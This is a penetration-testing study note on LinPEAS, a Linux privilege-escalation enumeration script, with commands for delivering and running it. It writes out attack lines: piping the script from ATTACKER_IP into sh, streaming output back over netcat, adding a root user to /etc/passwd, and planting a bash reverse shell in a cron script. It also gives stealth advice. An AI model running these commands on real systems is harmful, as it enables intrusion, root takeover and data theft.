LinPEAS
LinPEAS.md
LinPEAS
Overview
LinPEAS (Linux Privilege Escalation Awesome Script) is a shell script that automates the enumeration of potential privilege escalation paths on Linux/Unix/macOS systems. It checks hundreds of vectors — SUID binaries, sudo misconfigurations, writable paths, cron jobs, kernel exploits, and more — and color-codes output by severity.
Category
#privilege-escalation #post-exploitation #linux
Phase
Privilege Escalation
Part Of
PEASS-ng (Privilege Escalation Awesome Scripts Suite) — the same project also produces WinPEAS
GitHub: github.com/carlospolop/PEASS-ng
Getting LinPEAS onto a Target
# Method 1: wget from GitHub (if internet access available)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh
# Method 2: curl pipe (no file written to disk)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Method 3: Host on attacker machine and curl from target
# Attacker:
python3 -m http.server 8080
# Target:
curl http://ATTACKER_IP:8080/linpeas.sh | sh
# Method 4: Transfer via Netcat
# Attacker:
nc -lvnp 4444 < linpeas.sh
# Target:
nc ATTACKER_IP 4444 | sh
Running LinPEAS
# Basic run (stdout)
./linpeas.sh
# Save output to file
./linpeas.sh | tee /tmp/linpeas_output.txt
# Use color-aware output (piped, send to attacker)
./linpeas.sh 2>/dev/null | nc ATTACKER_IP 9000
# Quiet mode (less verbose)
./linpeas.sh -q
# Run only specific checks
./linpeas.sh -o SYS_INFORMATION,INTERESTING_FILES
Output Color Legend
| Color | Meaning |
|---|---|
| 🔴 Red / Yellow | High-value findings — likely privesc paths |
| 🟢 Green | Current user/group info |
| 🔵 Cyan | Information, interesting but not critical |
| White | General output |
What LinPEAS Checks
System Info
- OS/kernel version → checks against known kernel exploits
- Architecture, hostname, environment variables
Users & Groups
- Current user and groups
- Sudo permissions (
sudo -l) - Users with login shells
- Recently active users
SUID/SGID Binaries
- Any SUID binary that can be abused (cross-referenced with GTFOBins)
Sudo Misconfigurations
NOPASSWDentries- LD_PRELOAD / LD_LIBRARY_PATH in sudo env
- Wildcard abuse in sudoers
Cron Jobs
- World-writable cron scripts
- Cron jobs running as root with user-controlled paths
File Permissions
- Writable /etc/passwd or /etc/shadow
- Writable service config files
- Files owned by root but world-writable
Network
- Open ports (internal services not externally visible)
- Hosts file, ARP cache (for pivoting intel)
Credentials
- Config files containing passwords (db configs, .env files, etc.)
- SSH keys (private keys readable by current user)
- Browser saved passwords
- History files (bash_history, .zsh_history)
Software & Services
- Running services and their configurations
- Docker socket access
- NFS exports with no_root_squash
Key Findings to Act On
# SUID abuse — check GTFOBins
find / -perm -4000 -type f 2>/dev/null
# Writable /etc/passwd (can add root user)
echo 'hacker:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
# Sudo LD_PRELOAD abuse — if env_keep+=LD_PRELOAD in sudoers
# Create a .so, export LD_PRELOAD, run sudo command
# Writable cron script
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /path/to/cron_script.sh
GTFOBins Reference
For any SUID binary or sudo-allowed command LinPEAS flags, check: gtfobins.github.io
OPSEC Notes
LinPEAS writes to disk and generates significant file system activity. For stealth, pipe directly through
curl | shor over Netcat to avoid touching disk. The output file in /tmp is world-readable by default — write to a less obvious location or exfiltrate immediately.
Related Tools
- WinPEAS — Windows equivalent
- Metasploit →
run post/multi/recon/local_exploit_suggester— similar automated privesc suggestions within a Meterpreter session - Meterpreter — Common delivery vehicle for LinPEAS on Linux targets
- Netcat — Used to transfer and stream LinPEAS output back to attacker
Tags
#ethical-hacking #privilege-escalation #linux #post-exploitation #enumeration